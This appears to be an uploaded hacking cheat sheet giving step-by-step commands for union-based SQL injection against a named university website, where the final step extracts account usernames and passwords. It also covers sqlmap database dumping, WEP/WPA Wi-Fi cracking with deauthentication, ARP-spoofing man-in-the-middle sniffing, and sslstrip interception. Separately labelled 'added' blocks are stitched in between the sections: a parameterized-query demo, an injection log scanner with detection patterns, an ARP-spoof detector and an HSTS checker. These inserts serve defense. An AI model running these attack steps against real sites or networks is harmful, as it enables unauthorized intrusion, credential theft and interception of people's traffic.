SQL CMD

This document discusses various techniques for performing SQL injection and wireless hacking. It provides steps for using sqlmap to find databases, tables, columns and dump data from a vulnerable SQL site. It also outlines the process for cracking WEP security including using airmon-ng, airodump-ng, aireplay-ng and aircrack-ng. Commands are given for man-in-the-middle attacks using arpspoof and driftnet/urlsnarf, with additional steps provided for SSL stripping attacks.

Uploaded by

Vivek Gautam

union based sql-injection

~~~~~~~~~~~~~~~~~~~

Functions
database() || for finding the database name
version() || for finding the version of the db
user() || for finding the root user of the db
group_concat() || for collecting several values into one string

Step:1 find the parameter value || something=something

Step:2 apply single quote '


EX:www.site.com/products.php?id=15'

Step:3 find number of columns


id=15 order by 1-- || for union based sqli
id=15'order by 1-- - || for string based sqli
http://www.bzu.edu.pk/departmentindex.php?id=-48'order by 16-- -

Step:4 now find the vulnerable column

http://www.bzu.edu.pk/departmentindex.php?id=-48'union select
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15-- -

Step:5 Now find the tables

http://www.bzu.edu.pk/departmentindex.php?id=-48'union select
1,2,3,4,5,6,group_concat(table_name),8,9,10,11,12,13,14,15 from
information_schema.table_constraints-- -
Step 6: Now finding the columns

http://www.bzu.edu.pk/departmentindex.php?id=-48'union select
1,2,3,4,5,6,group_concat(column_name),8,9,10,11,12,13,14,15 from
information_schema.columns where table_name='useraccounts'-- -

Step 7: fetching Data

columns: uname, upassword
0x3a is the hex encoding of ':' (used as the separator between the two values)

http://www.bzu.edu.pk/departmentindex.php?id=-48'union select
1,2,3,4,5,6,group_concat(uname,0x3a,upassword),8,9,10,11,12,13,14,15 from
useraccounts-- -

If the site has more security (the plain keyword is filtered):


add /*!union*/ select
or
add /*!12345union*/ select

use it wherever it works
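Added example, not code from the original document: the id parameter of a page like products.php handled in a vulnerable string-built query beside the parameterized form, against a constructed in-memory SQLite database that stands in for the products and useraccounts tables named above. A payload shaped like step 7 pulls credentials through the first function and is treated as plain data by the second.

```python
import sqlite3

def make_db():
    """Constructed in-memory stand-in for the page's products and useraccounts tables."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT)")
    conn.execute("CREATE TABLE useraccounts (uname TEXT, upassword TEXT)")
    conn.executemany("INSERT INTO products VALUES (?, ?)", [(15, "widget"), (16, "gadget")])
    conn.execute("INSERT INTO useraccounts VALUES (?, ?)", ("alice", "s3cret"))
    return conn

def lookup_vulnerable(conn, product_id):
    # Vulnerable form: the parameter is spliced into the SQL text, so a single quote
    # closes the string literal and everything after it runs as SQL.
    sql = f"SELECT id, name FROM products WHERE id='{product_id}'"
    return conn.execute(sql).fetchall()

def lookup_parameterized(conn, product_id):
    # Hardened form: the value is bound as a parameter and can never become SQL syntax.
    sql = "SELECT id, name FROM products WHERE id=?"
    return conn.execute(sql, (product_id,)).fetchall()

# Constructed payload shaped like step 7: close the string, UNION two columns from
# useraccounts, then comment out the trailing quote the query template appends.
PAYLOAD = "-48' UNION SELECT uname, upassword FROM useraccounts-- -"

def leaked_credentials(rows):
    """Rows whose id column is not an integer cannot have come from products."""
    return [r for r in rows if not isinstance(r[0], int)]

if __name__ == "__main__":
    db = make_db()
    print("vulnerable   :", lookup_vulnerable(db, PAYLOAD))     # [('alice', 's3cret')]
    print("parameterized:", lookup_parameterized(db, PAYLOAD))  # []
```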

SQL Map

Assuming shu.co.in/lol.php?id=50
check if the site is vulnerable or not
Step 1: sqlmap.py -u shu.co.in/lol.php?id=50 --dbs //to find the databases
assume database name is sh

Step 2: sqlmap.py -u shu.co.in/lol.php?id=50 -D sh --tables //to find the tables
assume the table name is users

Step 3: sqlmap.py -u shu.co.in/lol.php?id=50 -D sh -T users --columns //to find the columns

Step 4: sqlmap.py -u shu.co.in/lol.php?id=50 -D sh -T users -C id --dump //to dump the data

alternative

sqlmap.py -u shu.co.in/lol.php?id=50 --dump //to dump all databases

or

sqlmap.py -u shu.co.in/lol.php?id=50 -D sh --dump //to dump the data of a particular database

SQL Map for kali

Assuming sh.co.in/lol.php?id=50
check if the site is vulnerable or not

Step 1: sqlmap -u sh.co.in/lol.php?id=50 --dbs //to find the databases
assume database name is shubham_choudhary

Step 2: sqlmap -u sh.co.in/lol.php?id=50 -D shubham_choudhary --tables //to find the tables
assume the table name is users

Step 3: sqlmap -u sh.co.in/lol.php?id=50 -D shubham_choudhary -T users --columns //to find the columns

Step 4: sqlmap -u sh.co.in/lol.php?id=50 -D shubham_choudhary -T users -C id --dump //to dump the data

alternative

sqlmap -u sh.co.in/lol.php?id=50 --dump //to dump all databases

or

sqlmap -u sh.co.in/lol.php?id=50 -D shubham_choudhary --dump //to dump the data of a particular database

SQL Map for backtrack

Assuming .co.in/lol.php?id=50
check if the site is vulnerable or not
Step 1: python sqlmap.py -u .co.in/lol.php?id=50 --dbs //to find the databases
assume database name is sh

Step 2: python sqlmap.py -u .co.in/lol.php?id=50 -D sh --tables //to find the tables
assume the table name is users

Step 3: python sqlmap.py -u .co.in/lol.php?id=50 -D sh -T users --columns //to find the columns

Step 4: python sqlmap.py -u .co.in/lol.php?id=50 -D sh -T users -C id --dump //to dump the data

alternative

python sqlmap.py -u .co.in/lol.php?id=50 --dump //to dump all databases

or

python sqlmap.py -u .co.in/lol.php?id=50 -D sh --dump //to dump the data of a particular database
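Added detection example, not part of the original document, covering both the manual union-based steps and the sqlmap sections above: a scanner over constructed Apache combined-log lines that URL-decodes each request and flags the order by, union select, version-comment, information_schema and group_concat patterns, plus sqlmap's default User-Agent. The IPs, timestamps and User-Agent strings are made up for the sample.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed log lines: documentation-range IPs, invented timestamps and agents.
LOG_LINES = [
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /products.php?id=15%27%20order%20by%201--%20- HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Oct/2023:13:55:38 +0000] "GET /products.php?id=-15%27union%20select%201,2,3--%20- HTTP/1.1" 200 640 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /products.php?id=-15%27/*!12345union*/select%201,group_concat(table_name),3%20from%20information_schema.tables--%20- HTTP/1.1" 200 700 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Oct/2023:14:01:02 +0000] "GET /lol.php?id=50 HTTP/1.1" 200 300 "-" "sqlmap/1.7#stable (https://sqlmap.org)"',
    '192.0.2.9 - - [10/Oct/2023:14:05:00 +0000] "GET /products.php?id=15 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

# Apache combined format: ip ident user [time] "method target proto" status bytes "referer" "ua"
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" \d{3} \S+ "[^"]*" "([^"]*)"$')

# Each pattern is matched against the URL-decoded request target.
PATTERNS = [
    (re.compile(r"order\s+by\s+\d+", re.I), "column-count probe (order by)"),
    (re.compile(r"/\*!\d*\s*union", re.I), "MySQL version-comment evasion"),
    (re.compile(r"union\s*(\*/)?\s*(all\s+)?select", re.I), "union-based injection"),
    (re.compile(r"information_schema\.", re.I), "schema enumeration"),
    (re.compile(r"group_concat\s*\(", re.I), "group_concat extraction"),
]

def scan(lines):
    """Return one finding per suspicious request: {'ip', 'request', 'reasons'}."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        ip, _method, target, ua = m.groups()
        decoded = unquote_plus(target)  # %27 -> ', %20 -> space, so encoded probes match too
        reasons = [label for rx, label in PATTERNS if rx.search(decoded)]
        if ua.lower().startswith("sqlmap"):
            reasons.append("sqlmap default User-Agent")
        if reasons:
            findings.append({"ip": ip, "request": decoded, "reasons": reasons})
    return findings

def probes_per_ip(findings):
    """Count flagged requests per source IP; a source with several is actively enumerating."""
    return Counter(f["ip"] for f in findings)
```

The User-Agent check only catches sqlmap left at its default; a caller can set any agent, so the payload patterns are the signal that survives.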

Wireless hacking

WI-FI
~~~~
~what is wi-fi?
~what is guided medium?
data is transferred over a medium that is guided by a wire.
~what is unguided medium?
data is transferred over an unguided medium (air).

~There are two types of security (WEP,WPA,WPA2,WPS)

WEP
~~~
Wired Equivalent Privacy

airmon,airodump,aireplay,aircrack
WEP-CRACKING
~~~~~~~~~~

STEP:1->airmon-ng || display the wireless cards
STEP:2->airmon-ng start wlan0 || to enable monitor mode.
STEP:3->airodump-ng mon0 || to scan for wi-fi networks
STEP:4->airodump-ng -w abc -c 1 --bssid 00:25:5E:33:FB:7C mon0 || this is used to select a particular wifi router.
STEP:5->aireplay-ng --deauth 0 -a 00:25:5E:33:FB:7C mon0
STEP:6->aireplay-ng --arpreplay -b 00:25:5E:33:FB:7C mon0
STEP:7->aircrack-ng sh-01.cap

WPA
~~~
1-6 same
STEP:7->aircrack-ng -w dc.txt shubham-01.cap
if an error comes, then use
--ignore-negative-one

Commands for a MITM attack (man-in-the-middle attack)

step 1 : arpspoof -i wlan0/eth0 -t (target 1 ip) (target 2 ip)
ex arpspoof -i wlan0 -t 192.168.1.105 192.168.1.1
step 2 : arpspoof -i wlan0/eth0 -t (target 2 ip) (target 1 ip)
ex arpspoof -i wlan0 -t 192.168.1.1 192.168.1.105

Step 3 : urlsnarf
ex urlsnarf -i wlan0
ex urlsnarf //for LAN (eth0 port)
step 4 : driftnet
ex driftnet -i wlan0
ex driftnet //for LAN (eth0 port)
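Added detection example for the ARP spoofing above, not from the original document: a monitor over constructed ARP reply observations that alerts when an IP address changes MAC or when one MAC claims several IPs, which is exactly the two-direction pattern steps 1 and 2 produce. The MAC addresses are invented, and 192.168.1.1 is assumed to be the gateway as in the page's example.

```python
from collections import defaultdict

GATEWAY_IP = "192.168.1.1"  # assumed gateway, taken from the page's example

# Constructed ARP reply observations (seconds, sender IP, sender MAC) as a sniffer
# or a periodic `arp -a` poll would record them; the MAC addresses are invented.
OBSERVATIONS = [
    (0, "192.168.1.1",   "aa:bb:cc:00:00:01"),  # legitimate gateway
    (1, "192.168.1.105", "aa:bb:cc:00:00:05"),  # legitimate client
    (2, "192.168.1.1",   "de:ad:be:ef:00:99"),  # gateway IP now claimed by another MAC
    (3, "192.168.1.105", "de:ad:be:ef:00:99"),  # client IP claimed by the same MAC
    (4, "192.168.1.1",   "de:ad:be:ef:00:99"),  # arpspoof re-sends every couple of seconds
]

def detect_arp_spoof(observations, gateway_ip=GATEWAY_IP):
    """Return alerts as (time, severity, message) for IP->MAC flips and one MAC owning many IPs."""
    ip_to_mac = {}
    mac_to_ips = defaultdict(set)
    alerts = []
    for t, ip, mac in observations:
        prev = ip_to_mac.get(ip)
        if prev is not None and prev != mac:
            # A flip on the gateway address is the classic sign of the attack described above.
            sev = "HIGH" if ip == gateway_ip else "MEDIUM"
            alerts.append((t, sev, f"{ip} moved from {prev} to {mac}"))
        ip_to_mac[ip] = mac
        if ip not in mac_to_ips[mac]:
            mac_to_ips[mac].add(ip)
            if len(mac_to_ips[mac]) > 1:
                # Both ends of a conversation answering from one MAC: traffic is being relayed.
                alerts.append((t, "HIGH", f"{mac} claims {sorted(mac_to_ips[mac])}"))
    return alerts
```

A NIC replacement or DHCP address reuse also flips an IP-to-MAC mapping, so the alert needs a confirmation step; static ARP entries for the gateway or Dynamic ARP Inspection on the switch stop the poisoning itself.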

Commands for a MITM attack with SSL strip

Step 1 : echo 1 > /proc/sys/net/ipv4/ip_forward
Step 2 : iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
Step 3 : arpspoof -i <interface> -t <target IP> <gateway IP>
Step 4 : arpspoof -i <interface> -t <gateway IP> <target IP>
Step 5 : sslstrip -k -l 8080 -w /root/Desktop/sslstrip.log
Step 6 : tail -F /root/Desktop/sslstrip.log
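Added mitigation check for the sslstrip procedure above, not from the original document: sslstrip only works while the browser is still willing to follow a plain-http link, which an HSTS policy forbids on later visits, so this evaluates a site's Strict-Transport-Security header for the weaknesses that leave that window open. The header values are constructed samples.

```python
ONE_YEAR = 365 * 24 * 3600

def parse_hsts(value):
    """Split a Strict-Transport-Security value into lowercase directive -> value."""
    directives = {}
    for part in value.split(";"):
        part = part.strip()
        if part:
            name, _, val = part.partition("=")
            directives[name.strip().lower()] = val.strip().strip('"')
    return directives

def evaluate_hsts(headers):
    """Return (ok, reasons) for a dict of HTTPS response headers (names in any case)."""
    lower = {k.lower(): v for k, v in headers.items()}
    sts = lower.get("strict-transport-security")
    if sts is None:
        return False, ["no Strict-Transport-Security header: a stripped http link is followed"]
    d = parse_hsts(sts)
    try:
        max_age = int(d.get("max-age", ""))
    except ValueError:
        # RFC 6797 makes max-age mandatory; a header without it is ignored by browsers.
        return False, ["max-age missing or not an integer; browsers ignore the header"]
    reasons = []
    if max_age == 0:
        reasons.append("max-age=0 tells the browser to forget the policy")
    elif max_age < ONE_YEAR:
        reasons.append(f"max-age {max_age}s is below the one year preloading requires")
    if "includesubdomains" not in d:
        reasons.append("includeSubDomains absent: subdomains can still be reached over http")
    return not reasons, reasons

# Constructed sample responses.
STRONG = {"Strict-Transport-Security": "max-age=63072000; includeSubDomains; preload"}
WEAK = {"strict-transport-security": "max-age=300"}
MISSING = {"Content-Type": "text/html"}
```

Browsers only honour the header when it arrives over HTTPS, and the very first visit stays exposed unless the domain is on the preload list, which is why the check insists on a one-year max-age.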
